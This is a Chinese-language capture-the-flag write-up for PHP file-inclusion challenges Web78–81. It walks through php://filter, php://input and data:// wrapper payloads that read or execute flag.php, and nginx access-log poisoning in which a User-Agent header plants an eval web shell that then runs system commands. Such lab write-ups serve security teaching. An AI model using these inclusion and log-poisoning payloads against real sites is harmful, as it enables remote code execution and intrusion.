Web78-81
Web78
这题是最基础的文件包含,直接?file=flag.php是不行的,不知道为啥,直接用下面我们之前在命令执行讲过的payload即可。
?file=php://filter/read=convert.base64-encode/resource=flag.php
Web79
这题是过滤了php,代码$file = str_replace("php", "???", $file); 意思就是把变量$file中的php替换为???。
一开始我是想沿用上一题的payload的,直接把PHP改为Php即可,因为str_replace是区分大小写的。但是在Linux中也是区分大小写的,也就是说flag.php和flag.Php是不同的文件,所以不行。
这时我们可以用php中的input伪协议,input允许开发者访问 POST 请求的原始内容,我的理解是在使用input协议的时候,你POST请求的内容会被当作代码来执行。由于上面代码过滤的是Get请求中的php,我们POST提交的php不会有影响。
?file=Php://input
POST传递:<?php system("tac flag.php");?>
除此之外我们还可以用php中的data伪协议,自php 5.2.0 起,数据流封装器开始有效,主要用于数据流的读取,如果传入的数据是PHP代码就会执行代码。使用方法为:
data://[<MIME-type>][;charset=<encoding>][;base64],<data>
MIME-type:指定数据的类型,默认是 text/plain。
charset:指定数据的编码类型,如 utf-8。
base64:如果使用 Base64 编码,则加上该标识。
data:实际的数据内容。data://text/plain;base64,xxxx(base64编码后的数据)所以我们的payload为:
?file=data://text/plain,<?=system("cat%20flag.php");?>
Web80
过滤多了个data,直接套用上一题的payload即可。
Web81
这题过滤多了 : ,那么伪协议肯定是不能用了,这里要用到一个新的方法,就是日志getshell。
对于Apache,日志存放路径:/var/log/apache/access.log
对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log
通过插件知道我们是中间件为Nginx。
我们先直接包含一下日志,发现日志会把我们请求的内容给记录下来,比如HTTP请求行,User-Agent,Referer等客户端信息,如果我们的请求里面包含恶意代码,那我们访问日志的时候恶意代码就会被执行!!!
?file=/var/log/nginx/access.log
利用插件构造UA头,插入恶意代码。
<?php @eval($_REQUEST['cmd']);?>
发起请求之后,访问日志,POST执行命令即可。
cmd=system("ls");
